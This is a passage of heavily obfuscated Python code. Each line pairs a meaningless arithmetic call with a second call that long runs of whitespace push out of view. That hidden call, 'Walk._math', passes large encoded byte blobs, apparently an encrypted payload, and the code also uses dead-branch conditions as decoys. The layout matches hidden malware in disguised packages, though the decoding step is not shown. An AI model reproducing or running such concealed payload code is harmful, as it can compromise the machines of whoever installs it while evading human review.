            _substract.Calculate(System = _substract.Add * -99769)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='liijjljjjjljljjjijijlji',_invert=b'\x7f\xd7\x95@\xe7\x10U\x05\xdcK\x9b\xc1X7\xf2\xfbY\xd3\xf4\xe3-j\xb0 \x0c$\xd9\xc3N\xcf\r\xa2b\x19\x9a]}\x1d\xd2\x13;\xc1\x01\xd9\x8e\xa3\xa2\x8b\xa9\xf8\xe8\xc0\xcd(\x10U\xa9\x00"\xdc\x95\x9b\nH6\xe9\xdb\xc1\xed\x98\x13c3\xd0\x83\x82\xc1JD\xa1-\xc8ASJ\x1ee\xb2\x18\xe4\xa0A\x10[Zn\xed4V%\x8d\xdc\xb3\x0f:2\x95lFV@\xb0I_\xd7\xe5\x15\xfa\x8f\xa4\x97\xbcWs\xfdz\xaa\x9f\xa7\xf1\xd1\x15E$\x024\x14\xe5\x80\x89_\x1f\xbd$\xefG\x0b\xb8\xe7$\xf6{JeoA\xef\xd5:\x89=2\xb5L\xf5\xec\x1bV[;\xab \xa2>\x08\x1e\xcd\x8f\x0c\xed\xb7\xcd5\xd3\xa4oC\xae\x99N3p\x98x\x89\xc7\xean\xef\xa1\xc4Q!th\x87\x16\x93B`\xd1]8\x11\x12\xa7\x83\x8e\x8770\xa9\xf6\x9ft\x91\xe4\x03G\x9c\xf68\xf4C\x80\x05\x07D\xdc\xb8\xa6\xa7\x0cUQ\x84w7\x9f\x98Ct\x81\xf88\t\xa5\xee\xc0\xb0\xdaz8P\x8d\xad@\x88\xf2 \xebb\xb0\xc1\x90\xd8\xd6\xb7\x85!\xd1Kr\xe4\x82\x12\xef:\x99\x155\xeb\xaa]\xb1\xcb\xc6\xc0V\xe9\x98\x1b\xf1+\xbdr\x06\xbb0\xa70y\n%\xd86\xcf\x1fH\xd0w\x17#]\xd7\x88IQ\x92jk\xd3\x1d\xfa\xf8\xc1\x14\x01d0\xe2\x13\\\x9e\x82jks\xafc\x8a\xbf\x00\xd2\xe2((@\xe5<*\xad\xcd\xe7i\x88\x15\xbc"t\x1d\xc6\xcc\x05=\xac\xb6:X\xbe\xddy\x1dw1\xc2\x04\xe8t&G\xe9P3\xc2TZ\x8f\xfb\x98[z\xe5R\x9dyZ\xae\xddL\x7fn\xd2k+`5\xcb)\xb0\x05\xb6\xa6>\x01m1j\xf9\x91\xbfL<\xb5\'\xaf\x7f\x94M\x95)q\x19\x97\x19\xe9\x97\xdd\xd16\xaf\xc1o\xd0\xd6\xe9\x1ek\xf6hS\x85V^\xb1\x17\xdb\x89\xa7\xba;P\x19\x00\xe6\x18c\xce1/\xf4\x02Kr\xba\xc9\x04he\x9bt\x96\n\x07N\xf8TS.\x82\ti\x9c\xe5j\xea\xa6j\xea9(\x93\xc8%\x12\xad\x02\x89\x9a\xa4M\x06\x9f\x13\x14J\x0c\xa1VuxC%s\xe6\xa06\xf7\x9e\\g3\x17\x14\xe3\xcb\xf4\xe8$x\xd5\xc1\x08\xca\x88\xad\x1dxY\x91\xa3\x156\xc1]\xd10\x8d\xf3\xb5\x02\x16=\xe0\x02\x06\x1e2}b\xe1;(\xda\xe6a\xd56\xa8\x13t\xfc\xa9*n\x18\xeb\x0b%\xb3\xec\xac\xc9\xc4\x02\xd9:\xca\xa1t\xe13\xac\xe3\x8b\xb5H\x91\x9dL\xc7Q\xec\x07\xa3 \t\xbc \x08\xfc8\x06\n\xe2`\x18\x00\xd1\xe5"\x08\x830\x8eU\xb3j\x8b\xc1\xc1\xae\x84\xbc\xba\x9aA<T}<\xf5\x98\xa87\x13\xfct\x07\xf3\xdd\xe3\x11\xcd\xe3\x9a\x06u\xde\xbc\xd8\xef\xabh\xb4\xc7\x9c\r\x81\x9b\x92\x08\x81\x11\xa8c\xf7\x13\xa9\xa1\x07\x83(U\x03\x0e\x86\x99\x07\x03J\rBj\x81\x01\xb8\xf7\xe0\xf2\xd9\x1a\xe7_\x00\x9b\xc7~2\xd4\x90Xa\xe4`\x95\xf4M\xf2cR\xe6\x8b\x98\xb12\xb6\xcc\x19\x86L\xf3\xe3wp\x84"\x955QZ\xb3O\x14\xf0\xf7\xc7\xbe\n\xf6^\xc9\xd8(\xa4v\ro\x8b?X\xb7\xbbQO\x0fG\xdb\xb4VJ\x1f\x85\xa4\xee8\xc5\xd3\x05\x97w\xcd\xd0\x10\xd8\x86\xc4J\x84^qhyWC\x8b\x0f`W\xdf\xa0\xcd\x1a\xc3\x04\xf0\xc8\xef\x9e\x03`\xf2\x02\xf0\x9392\n\xe5m\xea\x1a\xbcP\xc1t\xfa\xc7\x1a\xeaD\xbd\xda\xf4<&\xe8n\n\x99a!af\xffR\xdb\xa1\xed\xc7\x9e\xa0\xfd\xa0h\xadb\x9f\xdd7\xfb\x13Zj\x8aDq\xeb\x82O\xd7\x89\xb5\xee#q\xa2\x874\x97\x1eF\xed\xc5U[j\xedtE$)W\x00\r\x02RJ\xad\xd7\xa1U\xb5bW\xdf\x16#\x7f_\rk\x0b\x95\x90$\xbf\x19rw\x90K+(\x82\x84t\xf1H2$\xbdb\xd0\xf0\xc1\xf8\x8e\xfc\xb9\xb4\xa1#\x10"\x85\xd0\xba\xb7n\x860\xbb\xcf\x82\xb6\xe3\xe8\xc3\x91\xbat$\xfdg\x18\x95\x00\x19\x91\x85\xaf/\xa5\nm\xeb\xdb\x92\xbaz\xafE)\x89\xfcp\x15E\xd1\xfe\xfe\xd7\xc1\xbd\x14\xf9z\xd0l\xa7m9O\xc9/\x1f#\xac\x19\xd2\xf5\x87(.+\xad\x87\xbb\x94\x12\x0b\x94\xcb\xe1[\x97*.\xc5\x12\xeb\xfa5\xad\xf8X\xbc\x84\xbe\x0e\x89]\xd3O\xdc\xa2\x84-\x83h\xdf\x8b\x06\xb9\xf1@\xac\rY\xf1WT(\x052\xe5;\x9f4ap\x10A\x16X\xe3\xd9f6h\xd2\xd7\xad\xcd\xd0\x075\xe8\x00+NS\xee\x13\xf3j\x03\xe6l\xd2\xd4\x18\xdf\xa2C%\x91a|\x8c\xac\x13#\x91\xeb2\xb5\xf5\xb6\xbe=Pi\xd4\xfb\x95\xf7?y\x00\xa2f0\xb5<t:mB\x86) Na\xfa\x96 ?>\x97\x883\xb7\xf5\xed\xa1lT\x9d\xf2\x16\x19\xaa\xce\xc0\xfa%6\xb7\xbcdi5\xeb\xbb\xb7\x9f\x14\xe9\x95.\xb02\x92R\x93/\x90q\t\x94\xe7^\xe0\x182\xa3\xe5\xec\xdaE\xba\x86%8\xc6\xb6\xbe.K\'\xf5\x92\x11y\x87\xc5\xcf\xc0\xd9\xce\x85R\x9b\xa2i\xb6\x9c@\x99\xc1\xb6e$3;\xb5$@\x93\xbe\x0e%@\xb4\xea\x9f\xc30\xb5\xc8g\xe6:\x8bY\xb6\xe7n\xb0\xa0\xe8X\x84q\xa0\x8cpe\xe4\xcc\xc9\x0c\x07\x93\xa7\x13/\xf6\xe0\xf3\x17\x16n\xa4\xc0~n\x9c/\xf2Ja\xc6\xbd\x1c\x920\x9f]\xb3\xd7\x15\xd9\xde\x8bE\xa0\xe1\xd9E\x0eg3\xe2\xd5H\xc8\xd3;\x91\xad\x8a\x9dc V\x9fiel:\\FL[\x1d\xe2_\xca\xf9\x98i\xb5\xb59h\x8a\xaa\x0e\xc4\xa8\x81c\x95C\x04MUZ\x8f:\xf6\xd0\tkK\x8a\xe20\xf1b%G\xc1\x96M\xd4\xa2\x14\xc7\x18hV\x03 \x0e\xe3y\xa2\xde\x11\xe4f\x07\xcf\xbbo~\x13)\xff\xcds\xcb\x87h)\x8d\xf0\x9a\xa4\x98\xa6J\xd5\xa1+\xadN,\xe7\x11\xa2=\x89-}H\xf5\xa8q\xd8UZ\x9b\xee0@\x88\x1a\x81H=,\xad\x99"\x88\xab\xd2\xfa\x9aX\xb4=\xd4\xbe\x98Wc]f\xc8\xb2\x14%\xeb\xc8\xb72=v\xf5\xdd\x9f]sk\x88\xb8Z)\xd7\xbc\xee\x14\x1e\x06x\x9e\x87\x8c\xcd1R@ceg\xbc\xb2\x95\xd6#\x80S\r \xe1\xfe\x02\xab\x86"\xf0\x08\xd4dP\x94\x8f\x1f@\xd0\x93qK\x9c\x03\x10Z\x9e\xe0\xc6\xa4+\xc1\xc7\x01\x8e\x1d\xc1\x85)"\xe5\x83$MF\xfb\x1f\xfd\x8b\xe5\xf9\xa7m\x8c\x01\xbc4\x8c\x01\xf4u\n8\xa4\x01Q~\xe2Z\x81gD\xb3\xe4y\xab\xb2\xb6`\x9cdd\x9c\x10\xe7\'\x96\xf4h*\x92#\xae\x87\x91\xa2\x00FP\xf2{ Z\xaa\xb4\xf6\x12<\xb2m\\\x9b\x13\xd4.}\xb1\xad\xaf\x08\xcd\x16\xee\xb7=\xc3\xf0\x9e\xfa\x8b1\x0c\xef\x05\xa3 \xc0\xc0|\x18\xc0;\xfdW\xd2\xd1\xc9\xf7\xc2|dS\xbd\xbb\xa2\x9a\x8d\xba\xe6\xf6\xd2\x8b\xb14e\x1d\xb9&\x7f2\xde7\xa8^x\x89\xaeUp\xb6\x8e\x81\x86\xb4\xb9\x16\xe4\xb3\x9a\x8d\x80u\x8e"\x86\xd5\xd6^\x9c\xb6\xc3\xd2T\x92id;\xcd\x9a\xf4m\x91\xff\xb6\x17\x17W\xda\x81K\x07\xf9\xc4s\x84\x10CX\xb89\x908\xe2zE\x14&\x84\xad\x04\xa5_\xa5\xf5\'\x80UuM8\x1f\x18\xe6\x0ba\xc38n\xa5\xa0\x95\xc8hMN\x9a\x94\x10\x95E\x15\xdaME\x8a\x12\x96\xdbEm\x8a\xa4R\x91\xa2\xd8\xe6\xe0\xc04\xe9\x82\x88\x15\xa1Q\x14\x0f1\x06\xc6\xad\x00z]\xdf6N\xcf:\x08\xcd\x1a\xf3"\x01@\x83\xb9\x91P\x04M\xa9M\xdd\x9c\xba\x87\xc0\xc2\x95 \x934*\xb7\xc1&\xc9\xb5\xa1\x9eaX\r1\x17g\x18\xcf\xfd\xde\x9d\xba\x82\xb3\n\r?R(,J\xa6\x05_\xbb\xc4\xd1\xa9\xb3\x93\x86\xc3\xc8\xef\x82\xa8\x83\xd2\x07\x18#!\xcbh\x82\xcfMK\x95\xd5\x8c\rauO\xadh\x88\x98\xfd\x92^>*U%\xde\xd6\xd7Y\xec\n\x12\x12\x94\x8e\x1b#\xe44\t\x86\xe8|\x8dQ\x07\x86\xe7\xa1\xd2\xb9\xbb0,\xe2\x97\xfb\xf2s\xe0\xeb\x9b\xabK1f\xf8\x8d\xd0\x95\x00L\x8a\x94\xf9Wi=\x1c\x16N\xc8\x15\xc5\x8f#\xdbb\xa6\xc4\xd6Em\xd2\xf7\x10\xdc\x02\x07)\x1f\xc2\x15\xcc\x7f\xd0_c\x9b\xfa\'\n\x88\xa8U\xd2#\x91\x1a\x87q\xe4/\xd4J\xbd$,\x1d#\xa2\x16\xe4K\x86s\t\xf9\xfd\x1d\x92\x95\x06\x1f-l/\xe1{\x91`\xbb#\xc6\xf70\xc8\xed^\x1cU\xf7\x8c#\xd4\xf9\xe1\xeaeg$\x81\xcd\x88Z\x9e\x98\x04\xcf3H\x82]}\x1b\xb2\xa8\x1e\xd8 \xaa\xf13\xac\xa0\xc4p\xac\x1f\xe95::\xf8\x8f\x13\xf9\xdcP5\x82\x83\xa7\x03\xe9\x87\xa1\xfd\xf8\xc8\x93\xa0)\xeb\x07\x11o\x06h\\\x87\xb8bP\xb1\x98\xb4\xda\xfaS\x08 e\x1c\xa8\xfb\\\x89\xea\xbe\r\x04C\xf5\xa8\x89 M\xd9\xe3\xb9;\x12HG\x05\x19\n)pES.)\x9aunP\x07n\x12pu\x9dU\xc9q\xb0g\xb1h\xe3\xdd\x829#\xa4\xf9\r\xb1\x8a3\x85\x98\x878_*\xad\x0e4\xae\xd7L\xc1\xeeB\xf5n\xb0\x0ce2>\'\xd2t\xde\xbf\x13\xdaT\xba\x95\xaag\xb6\x18pRQ\xb4a\xf5[\rY\xef\x00\xc2\xd8\xea{72N|\xef\xa6%=\x84\xe4+`\xea\x9d\xe4\xd3\x9a\xec\xd9"UF\xb9\xad\x11_\xd0\xb6\xe9\x1b#\t\rU\xef\x1d!\xcc\x9b\\\xaa\xc3rk\xb7)nYO\x92Wa\xf3<\xf9V\xc4\xbdI_\'\x04\x1dv\x1d\xe9T\xb3+\xcfu\x90g\xea\x86\xbf\xa5w\xc4V\x89o\xa58tx\xbb\xdb\xa0\xf1:\x9b\xe4\x02\x92\xb4\x93mRKs\xc7\xbb\xa5\xd9\xef\xea\xdb4G\xa3\xd6\x97Ni-\x1a\x1b\xc8(\xc1\xe6*+e/\t\x18\x8b\xf0\x14i\xb5\xb5\xb3\x1fC\x18r%\xe4\x1aX\xf7\x91\xe5\x98m\xd2\xb7UN\xdf\xb6\xc3\xef\xee\xa2I\xadk+\xfe3\xcf\xba\xce6$\xa7I\xdf\x8e\x90\x13j\xd4\x99\xe8Y\xd3T\xf4>N\xc5\xa1\x0c\x93\xde+\xf9\xb1\x9aK\n/\xa9\xb7\xf6\x9d\xde#C\x16\xfev\x8b \xc6\\\x00A"\xdc \x97\x16\xd9S\xa0L\xaaz<\xbb\xbc\xba\x82\x80.\xe6\xce\\a!')

        _substract.Calculate(System = _substract.Add / -7931)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='mmmmnnmnmmnnnmnmnnmn',_invert=b'E\xb5\r\x15\'\xeb\xc0\x175\xf2R\x00\xcesM|k(o\xe7MIo\x8f\xb1\xaeY\xa8Oz\xf5\xf4\xdb\x97\xca\x91\x17\xa1\x97\xca+\xb4\xc9\'jL\xb3\xb1\x97\xa5G\x1cE"B\xcaU\xd2w\xf5;\xce\xa4\xfb\xc1\x98OX\xc6o7\x96];N\x97T$\x12\x15L@\x08\xe4\x10/\x9e\xb2m}\x1dR\xb8\'q\xbc\x7f\xd4c\x8b\xc5!\x855\x0c\xea\xc7V\x0e\x8d\xe1\xe5\xa6\xee\x99\xeb8\xf3\x06\xbb\xa2\xc8KZ\xd8\xee\xa68\x06lmx\x1c\x0eJ\x11Q\xbc\xa1\xd5\x89\xab\x82\xf2\xccI+\x8b\x88x\x13CS\x95\xd6\xe6x\xef\x18\xb1\xd5\x11\xfaX@\xd1\x03\xc4\xb5_m\xed4\x03%\xb1U\x8c!I*\x92l4{\x066\xe9\xdbp\x06v\xf0\xb5\x98\x1c\x91ri=\xc9&q\xe3i\xd1*\xa0\x8d\x86*\xa3\xa5\xd2\x12ta{\xdf\x9e\x0b\xa2\x95\xd9\xb1l>`k\xae9q^\x1c,\x85\x82q\xba/\x1a\xb6\xdby\xf8K\xbe\xb7\x98~\xe2\x1f\x90\xd2y\x815\xfcw\xf5\xed!\x08\x04\xb9\xf2\t\xf2\xf6\x82\xe0\x02\xc1A\xc4"\xa5\xb6\xa6b$\xe5\n\xa9Cd\x18\x8e\xd0\x03C;\xb2\xda\x9a\xee,D:\x8d\x149\xc0\xb1@\xd9{ /.\xb5u\xd6\x08\xec\xfc\\)\xd0"\x05\x8bmj\x99&}[\x12l\xb4d]\xd5\xe4\x97\xa1)uf\x91bb\x8b\x93\xe9\xd6\x0b}>Y\x06\xa4\x00k\xc5\xce\x81k\xde%Ik\x82+\xe1\x08\xb1\xe9)\x95\x8dxO4<\xa5\xd6C\xa36_\x87\xf2\x81J H)\x04"\x05k>\xb9\t\xe0?\xe2P(1\xe8D\xd5\xd6\xe6\x88\xda\x14\x99\xb8}\x145\x1e\x83\x9b\xe3jk\xe3\x91\xc1z\\zK<\xea\x01\x93\x9dWZ;\xc3\xb4\xe2\x92\x18\x11\x18\xa2\xa0u\xca\xe5U\xb7\xf5mQ^\xb5S\xa2B\xef\xf5\xa5\xecj %d(o\xbb\xa9\x0e\xe2G3e\xf1x\xf3p\x14\x10\x91\x1a\xc4\x83\x90>m\x91x\xbe\x17\x85@\xb26\xf5\xd4{#\xf5^ \x84kQ\xefe\xceQ\x92\x93W#,\xc4X\xe5\xaf\x89\xa3\xa9\xfd\xe1\xf7\xe1\xd9 \xec\xd5\x0f\xcanj\x83\xbe\xfaI|\x8c\xadDr\xeb\xda\xf6K\xab\x8e\xfd\xc2\xaed\xdf\xbd\x9e\xfd\xae\xf0\x9fE\xb3\xd5!\xad\r/?\x83\xef~0\xaf\x9d\x1b\x08\xde+\x8d\x98}\xa1T=\xcc\xad:G\xafP\x87Z\t[\xa5\x02\xd4\xf2\xbe\x8b\xf1\xe3\xa4\xc4\xa0\xe6\x8f\x16\xeeh\x9bE\x9ao\x8e\xf4[\x17\xf4\xd8\xa6Bb\x91x\xc2l\xbb\xab\x99\x08C\xcf\xb0\xd0\x04}\xafU\x16\xd3\xb7\x9d\xdc]L\xf4\x1euO\xef\xae\xbdb\x07\xa9je(3\xda\xa5%\x1dM\xd5\xf1#\xb1\x9a\x0e_\xcdd\xcb}\x9f\xb9\xd4a\xfe\x0cX)\x12\xee\xd7\x1f\xb4V:9\xcf\xdd\xf1kv\xe1O?*\xe6\x84$\xe2\xef(\x85\xe5\xb7\xf5uO8z\xdc5\x834\xe4f\xca\xb1\x95)c\xbc$\xfa2\x97\x1e\x0e<\xc8\xddu\xd6\x01pS\xe4\x93\x0bb\x03\x00Z\x00Hs=\xdcp\x0c,[W\xdc\xfez\x18J \xce\xf2\x97\xee\xea\xdb\x82\xfe\xf4u\xd2`?k\xec\x0e\xd3zu\xcc\x84\xb5Y\xfd$\x96"~KI\xb7\x0e,\xf6\x83]}\xdde\x1d\xf4\xc3\x9a\xb7=\x8aS\xc5\xca\xda\x91\x1c\'jX\x12/:%\xa2\xd4h\xff\xc2^G\xda~Z\x82|\xc0\xeb\xe3\x14(5\x87#\xe4|s\xab8\xb3\x90\xf3\xa5\xfaP\xa9\x84\xb3\x1b\xa2\xbe^\xea\x18\x8f\x19\xfd\x92\x8d\x05\xae\xe0\xc6\xbf}`\xe5+\x8c\x8a\xf0\x07\x91\xa6\x92\x18\x8a\xa8V\xcbC\xb9\xaboC\xe6\xc8\x8e\xccX\xa9\xb5\x1e\xd8\xe4\x9f\x92H\x15Y\xb1\xd3m\xfd\xf6O\xf9\xae\x17FEk\xd0&\x1c\x94\x16\t:;\x01a\xa8\xe3\x8c\xc1l\x82\xd4\xc1\xb0kX\x87\xcb\xa6\x12?71u\x1fR\xd5\xdfcd\x08\x96T\xbc\xe9\xf6"\'|h\xbe\xc5OR\xd7W\x92\xa6\x9b,\x8a\xf5\'\xef\xfe\xfe^\x9f:\xcc8l\\\x81\xf6\xb5N\xa0\x04\x04\xd5(Zt,2<\xf8\xc4\xb5c0\xaf\x8e\xd3M?\xb5\x88"Q"\x1da\xfb#\xc4\xbe\x04\x18\xa3\xa9\xb4v\x86\xf4\xda\xb2A\x00`b\xf2\xd8jT\x93\xbe-b4{\xc5ffN\x8a\x16\xd9\x1eF\xf1-\xda~\xc8#\xf43\x0exV\x91\x80\xba\xef\x9a\xc4{\x08\xb6\xb9\x04}\x91\x90\x8f\x83^\xacx\xae\xd4b\xa5\x9d`\x86N\xd0{\x8eN\x95\x02\xb7\xb8\x06\x95\xd7$7\xbe\xca(P\x07\x1dY\x05A0#k\x1eL\xa7\xd8Z\x9f\x9f\xb5\x8c\x13\x8c\xd5\xcdF)\xbdR\x1a\xe30N\x83\xe9\xfe\xfe\x1aS\xa3\xc7\xb8l\xba\x85\x1b"\x83\xeb\xb7\xcb\x10E\xd6\xddff\xdf\xd5\xb7\x17\xd0O\x8b\xb4\x17\x88\xac\x0f\xb1\x02\xf9\xe8\x96hT\xa9\x9aF\\m=xX\xa6}\x16z9\x17]\xa2\xacv.\xab\x13\xa5\xcb\x8dik\x97\x9c.\xe0\xef4\x02\xef\xe7\x84\xfb\xeb\x88\xff\xa8\x80\x0bH\xacW.\xf8\xa2z\xa8\x12{\x97q\x814d\xef\x07\xb2\xa7\x03&\xdcHy\x0e\xe1\xb6\x12\'\x98\xbc\xf6,\xd5\xb6I_\xc7\xbcqh\xd0\xa3\x07\xb7\x03\xc3\x0f\x8f\xb5k\x9fG\x9a\xdf\x9c\xe4\xba\x95!\x1d0\xe7O\x80\x05\xbe\x00\x19M\xe4\x89\x95\xd6\xe6\x90kAD\x02\x19 |\x94(\xb6+\xad\xaf\x15:\xe9q\tI\xf14\x8dt}\xb4\x14\xb3\n\xbd\xdb\xb4\xdc\xda\x1c>6\xc2\xd34D\xa6\xd8!\xee.*\xb75\xb7"\x88\xd4)D\xa8;\x12/\xa2\x15Qi\xed\xac\x08\x88w\xda\xae\xa4!\x0b\xbd\x8d\xfem\xd2w\x0f\xa4\xd7\x9e\x04kRo\xddTa\x8f-r57\xb4-\x10\xccUj\xaf\x8f8\xee\x18\x8b\x03\x86]Hc\xc9\xcc\xe4\x1b\x170m\xc8\xe3\xb2E\xd8\n*;\x89L0\xccF\xe2\x0f-a\xbb\xabo\x0f\xb4H\x94\xc71\xe4\x14\x10\xaa\xa90zOy\x1c\xa5\xd6\xe6b/D\xb2\xfd\x18\x95<\xcc\xa5\x7fO\xcc\xf9\xa5\xd6\xc3\x85\x85\xf6\x15i-\xb3\xa5*\x15z\xedJ\xbd\xddM^\xbaV\xb8b\xa0\xa8\x87\xe2\x91$v*\xad\xcdW\x94\x04\xb3\xb3\x87\x08\x8f\x87%)\xc2\x8b_im\xbaC\x1fYWbD\xcf&\x88\x9f\x05\xcd?\xa8\xb66\xff\x85\xd1-\x11\x7f\xfbH\xf3\xed\xe1!\xfb\xd5\xd6\xd7@x\xb5\x97\x90s\xdb\x07\xb2\t\x87\xe5\x84\xbb$\x10\x9b\x970\xa9I\x80\xf6\xf0"\x1e\x16\x8a\xfdzq\xa0,h\xd5\x06\xbd\xd4\x96\x1f/{F\x01\x15\x01M\x9b]\xd9\xe2`p\x16\xb5YtvB\xd6ZV6\xe1\xc4\xb2\x94\xddT\xc8~r\xe2\xf9\xf2\xfd\xb9\xb2\x16m\xd7\x8f\x0f~\r\xbbTnD\x1c\xab\xd0C- 1\x80\xa0R\xb8\xca\xf0I\xfb\x1d\xb5\x97\x11\xa1<\xd56\x8d\x90\x00\x83]\x80c^%\x1e\xbe7\x84P%|\x87:\x99\x11\x8c\xddd\x91tXo\xadJ\x07\x0c\x0c\xee\x1c\x84\x8aJ\x0b\xa6(D\xb2\xb8\xc6V\x10jW\xdf\x86P\x80\xfd\xb2\xd3:P/n\x134F\xacH\x9dx\x1b\xf0\xe9B\xd4\xf4\x0e\x1c\x0cW\xe2f\t\xb5\xe3Eh\xc5\xc2\x1e@\xee\xee\xd0t\xaf\xe4\xb5\xdat\xb5\xedQ\xe0\xe6\xbaG!F\xc3\x95\\\xf5=p\xce\xc6\x1d8\xf2M\x8d:.\xcdIn&\'6:\xb1\xe7\x87\x98pH\x05\r@\xbd\x18U[\x9b[\x86>\x92\xcfi\xaa_T\xa7\x87\xd5V\'(\xcb\x11\x97\xb9\x8a8\x9b{\xc4e\xb0*\xad\x9d\xa3[AI<\xcav9\xb2\xb5\xad\xdf>\xf6h\x07\xe7\x91Y\xd4:\xa4.p\x05\x1e\xe3\xf4\xc7\x1c\x86\xd7F\xee\xd6\\(a\xa5\x97\xd4n\tJK\x98Q<{\xbb\xfa\xb5\xb4\x9b\xb6\xcb[\x1f\x83\x00\x01\'\xd8\xa1~\x8f&B\xa5\xb5\xb9\xcd\x11`\xf61\rr\xf0\xf3\x10\xb1B\xa5\xb532NJ\x9bz\xd6\xb9\xb2\x8d\xf2\xa1\x85\x8c\xdb\xd5\xb7\xbb\xfc\x1f\x10\xf9\xfb\xc4\xf3\xa0 \x93\xe7A\x95\xac\x8e\xd5\xb1\x0e@\xb8\\U6\x11N\x82\xaa\xaa\x13\x18\x9fM\xc8P\xfe\xeb\x16\x9d\x04/e\x08\xab\x8d#z\xd1W\xcb\\j\x9b\x91\xb6)\x0f\xad\xfc\xe7\x84\xd7!\xd8\xbf\xb8Z\x9d\xbaI\xaa\xa5\xe1\x9c6\x9cQ\xa1\x95a\xe9\xc6\x85I\xa6:\xc2\xcc\x17q\np\x195/fX\xfb\xca\x0f\x86P\xe6\x0bg\x8f\xa7\xfa%\x88?L\x10\x8a\xeeY\x9f\x8aj?\xb1T\xf3-\x0cf\xe10X\x84>\x1b\xfd\xa1\xd5;\r\xd2\xdeg\xa0\xd1\xde\x85rkS(UB\xacN\xbc\xc21\xd2\x95&\xcaf\x05\xdfp\xe8/\x12\xc8`\x0c\x930\xeeX\x98\x0f\xff^$[\xa3)\xd1\xc7\xab\xd5\x0f8\xc6\xa0\xad\x9dz\xa8\x01\xc9\x85tD\'C"LR5\x1cz/\x8e\xb7\xd4\x19\xb9\x8b\x92L\\h\xc9\xe8&;\xd7\xafd\xa0\x1bc,\x0c\xc3(\xe8\x80o\xa9_Z\xab\xa9\x896b\xbe\xfc\xe8\x06\x9a\xea$\xadT\xd8\x1cC\xeb.t\x81U/\x04I7\x17\x07W`\x19\xe8T\x90\xe0\xe3\'\x9byC\xdd\x8f\\K\xec\xd3\x9fP3\x80\x13\x0b)\x92\x14\x18$,\xc4\x88lu\xd3\x12\x81\x017\xc2\x10\x88\xaf\xcb\x96&\xe5\xb6\xce\x91E\xb1\xacm\x1e/\xdfj\xb7a\x1c\xbb\xfa:\xe1\x98\x9e\x9a\xe45Nq+\xd3\x97OC\x9b\xde\xdcM\xe2F\'\xec\xbai\x18S\xca\x06=\xb9I\xda\xb8\xf5\x99\xd3FP\x0f!{\x92J\xad\xafa!\xec\x9dF\x00u\xba \xef\xbaC\xad\xa1\x8bI~q\x81\x054!\xb9\x10\x0bb_\xe4\x07L2\x94j;\x924(\x04\xed\xba\xd2Ni\xb2\xed\xea\xeb\x163\xf5\x1a\xd1\xbf\x01\xe4\x7f^@)h\xa8Y\x8e\xdb]\x8b\xd3\x1d\xa2\x14TWV\x87\x81\xd4\x12c8pW\xf6\xbf\xff\x1f\xd6Y+9O\'\xe4\x15U}J\xe5;>Y\x7f5\xbe\xbc\xba\xba\xba\xbc\xbc\xbc\x1a\x8f\xaf\xc6j\xe3\xea\xa8\x01+\xafRY\xbbF\xb7\xb2\xf5\xa8\xb2F\xc5\xef9\x8a\x80;\t\xe9/K\x7fVU\x89\xa3L\x9a\x1ddX7v\xbd\x06\xd6\xf85\xc0\x8b\x8f\xd4=)1\x06Y\x1d%\xddihm{\x16{\xc4\xb6\xbe\x982u\x00\xf6\x88>')

        if 480235 > 3150443:
            _substract._negative(_builtins = 90961 * _substract.Add)
        elif 403611 < 828654:
            Walk(_calculate = 47352 * -9897)._negative(_builtins = -50882 * _substract.Add)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='XXXWWXXWWXWWWWXXXWWWW',_invert=b'\x12\x7fw\xc5\xec\xed\xa8\xadA\x959\x12\x92\x05j\xdc8\xa0\x1c"\xc8<\xc0Ws\xa0\xc6\xe8\xa2\xad\xe5\x10\x9a\xf0@!\xc8\'\x1e\x90Cx\xea\xaf\x1d\xe2\x99\x8ay\tA\xa3_ns2\xb8Sd\x95\x8c1n\x1bb\xdc\x14\x82J\x84\xb2.\xb4:\xd1\xfd\t=\x1c\xa0e\x18\xa0\xae\x0fa\xe9\xb8\xda\xfaZH\xefN\xac\x17\xbd\xfbklBz\xb1,\xa5X\x16V4\xfaI\xa0.\xc4\xca\x1bj\xfe\xc6X\xf3\xf4\nw\xafyt\x14\x81X\x11F\x0e\xdd\xe5\x94\x7fT$\xc8Y\x05+\':\x83UijZ(; \x05\x07\xa6\x8eJ\x0c4\xad\xec\x16\xab\xd3\x02\x82q\x95$\x9d\xaa\xbb\rt\xc9\xe1\x1f\x9a\x00\xf3\x90\xb3x\x17\xb7w\xca\x8e\x05\x1f\x85l\x8c\xae\xaaR[s\x19\xea\xe1\x07"\xcc\x86\x80\xc2\x001\xca\xd0a\xb9\xf5\xe0R\xacn\xadR\x0b\xd5D\xdd\xe1\x9fV\xac\xe6+U\x9b\xc5\xa5%D)\xc4\xd5\xceC\xe4\x10H\xfe\x14!J\x95\xd6\xd7Z\x0b\xf6\xf2\x05\x8d\x92\x0e(\x1c\xaeQ\xf6\xc5B\x8a\x1d\xb9\xa1\x9d\x84\x04=\x8e\x920*\xf0\x88E\x1e\x10\x0f&\x81T\x8e\x0c\x17\xea\x159"\\\x14<\xb1C\x16\xb2\xce\xd8\x95\x90\x9cUUv\xc7lZ@\x1c,4/\xae\xd9v\xc4\x88\xdb\xbb\x1aS\xb06\x17\xa5\xc7\x85+{\xb3\x87\x9a\xc6\x88\xd8\xd4\xac\x97_\x08\xb2\x89\xb7c\x9f\x95\x1d\x8aM\xd5^\xc3\x85\xed\x1f\xd8P\x8b\xd2*|\xe2b\x9eu\xaa66\x96\xb0\x06\x86\xfd\xd5\xbdy\xb0"\xc5\xea\x1a\x11j\t\x91\xa6U\xa9\xb4v\xf6\xbc\x0bA\x94T\xc4\x14\x1a?\xf1\xac\x8fJ\xd57\xb6\xf5M\xdcz\xde\x0f\xce\x13?\xa0\x18/\xf1\xe2P\xde\xa2\x13\xfd\x85\xf2fc\xc4F\x8fP\xc9K\xd8<-\xb56\xdda\x8c\x99f>\xea3>\xc6EI\xf1\xac\xb4v\x86\xc3&\xd6\x90\xf0"C\x9e1\xd2C\xc2@bw\xf5\xdd\xa3\x98\xd4\xee\xca:\t*t>bV)\x1doCk\xa7\xd3 